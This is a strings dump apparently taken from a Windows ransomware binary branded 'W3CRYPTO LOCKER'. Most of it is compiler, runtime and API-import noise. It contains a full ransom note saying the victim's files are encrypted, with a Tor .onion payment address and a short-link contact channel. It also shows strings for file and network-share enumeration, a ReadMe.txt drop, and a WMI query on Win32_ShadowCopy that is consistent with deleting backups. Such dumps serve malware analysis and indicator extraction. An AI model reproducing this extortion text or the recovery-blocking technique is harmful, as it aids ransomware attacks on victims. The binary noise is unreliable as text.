!This program cannot be run in DOS mode.
Gd'uDev
Gd'uBe
Gd'uCen
Gd'uFem
Gd'uAe}
GdRich|
`.rdata
@.data
.reloc
D$$;|$
G@expa
GDnd 3
GH2-by
GLte k
9"F#3O
Genuu?
ntelu7=ineIu0
=cAMDt
Hygou}
uineuu=nGenun
D$| ~A
D$$Pjx
D$9#D$$
D$$PhP2A
SVWQPj
t/hx2A
URPQQh
;t$,v-
UQPXY]Y[
YYh$2A
zSSSSj
f9:t!V
QQSVj8j@
PPPPPPPP
PPPPPWS
PP9E u:PPVWP
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
?5Wg4p
%S#[k =
"B <1=
_hypot
_nextafter
expand 32-byte k
expand 16-byte k
Microsoft Hv
IsWow64Process
kernel32.dll
ZZZZZZZZD3"
.text$mn
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
StrStrIW
wnsprintfW
SHLWAPI.dll
WNetCloseEnum
WNetGetConnectionW
WNetEnumResourceW
WNetAddConnection2W
WNetOpenEnumW
MPR.dll
RmRegisterResources
RmGetList
RmStartSession
RmEndSession
RstrtMgr.DLL
ReadFile
WriteFile
TerminateProcess
WaitForSingleObject
CreateFileW
OpenProcess
SetFileAttributesW
CloseHandle
SetFilePointerEx
GetFileSize
GetCurrentProcessId
GetLogicalDrives
FindFirstFileW
FindFirstVolumeW
HeapFree
FindNextFileW
GetCurrentProcess
lstrlenW
WaitForMultipleObjects
SetThreadPriority
lstrlenA
FindClose
GetModuleHandleA
lstrcatW
CreateThread
HeapAlloc
SetVolumeMountPointW
GetProcAddress
FindVolumeClose
GetProcessHeap
GetVolumePathNamesForVolumeNameW
lstrcpyW
FindNextVolumeW
lstrcmpiW
GetTickCount
lstrcmpW
MoveFileW
GetDriveTypeW
EnterCriticalSection
ReleaseSemaphore
LeaveCriticalSection
InitializeCriticalSection
DeleteCriticalSection
CreateSemaphoreW
KERNEL32.dll
wsprintfW
wsprintfA
USER32.dll
CryptReleaseContext
CryptGenRandom
CryptAcquireContextA
ADVAPI32.dll
CoCreateInstance
CoSetProxyBlanket
ole32.dll
OLEAUT32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwind
GetLastError
SetLastError
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
RaiseException
GetStdHandle
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
FindFirstFileExW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetFileType
GetStringTypeW
LCMapStringW
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleCP
GetConsoleMode
WriteConsoleW
DecodePointer
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
W3CRYPTO LOCKER
Attention!
All your files, documents, photos, databases and other important files are encrypted
The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files.
The server with your decryptor is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
1. Download Tor browser - https://www.torproject.org/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://34vm2smykaqtzzzm4bgycfzg5fwyhhksrkpahdbiswmmuwuu7hmvuvqd.onion/?502%s
5. and open ticket
----------------------------------------------------------------------------------------
Alternate communication channel here: https://yip.su/2QstD5
expand 32-byte k
626T6f6u6~6
707N7c7
8,8^8w8
=!='=A=G=a=g=
?.?A?G?M?V?`?
4*868=8P8c8p8|8
9*949@9L9^9n9z9
:&:1:C:R:^:m:
;";*;2;:;B;J;R;];h;s;~;
= =&=?=b=
>">(>:>B>H>n>x>
?^?t?~?
0)0/090B0Q0V0d0k0q0
1=1W1f1
3+343`3g3
4%4+4D4X4]4c4j4
6@6G6f6s6
7 74797?7F7b7w7}7
8%8+80868;8F8K8R8\8b8l8r8
9/9E9N9Y9`9
:+:;:K:T:
:';R;g;l;q;
?'?4?J?
2,2@2E2X2q2
4>4G4P4^4g4
9!9>:E:k:p:
; ;G;[;w;
<"<(<L<U<
<6=S=_=
>#>K>f>k>p>
?!???I?U?Z?_?
8,;4;;;
>.>5>=>U>c>k>
303K3[3`3j3o3z3
5%5*565;5O5
6%676K6S6]6f6w6
6A7N7g7l7u7
=H>S>D?J?\?
0.1?1J1z1
3k4F5M5{5
626P6w6
6#787J7W7p7
2E3L3S3Z3t3
4B4j4Z6
6&7r7{7
=#=>=E=
?!?7?r?y?
1!1U1x1
2)2;2M2_2q2
3"343F3X3
8P9f9k9p9
: :5:[:
;+;O;c;h;m;
< <%<*<H<W<b<g<l<
=5=:=E=l=~=
?Q?o?z?
L0Q0V0[0m0-1
5"505<5H5V5f5{5
575h5n5
:<:]:h:v:
;2;Q;c;m;
=,=S=r=.>^>x>
1L1m1t1
2W3i3{3
<*<0<><q<
=/>4>y>
>!?-?A?M?Y?y?
0 0+0:0M1~1
5&5{5|6
6-787>7G7
8#8l8u8~8
:-;L;};
>$>:>P>X>
2p2t2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
5 <$<(<
> >$>(>,>4>8><>@>D>H>L>P>\>d>l>p>t>x>|>
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<1@1D1H1
; ;$;(;,;0;4;8;<;
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888
J2N2R2V2L;T;\;d;l;t;|;
<$<,<$=(=,=0=4=8=
4 4<4@4\4`4|4
5 5<5@5`5
6 6@6`6
7 7@7`7|7
1H6L6P6T6X6\6`6d6h6l6x6|6
Aapi-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
Aja-JP
((((( H
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
Windows
ProgramData
$Recycle.bin
System Volume Information
\\?\%c:
%ls\%ls
ReadMe.txt
%ls%ls
__ProviderArchitecture
ROOT\cimv2
select * from Win32_ShadowCopy
Win32_ShadowCopy.ID='%s'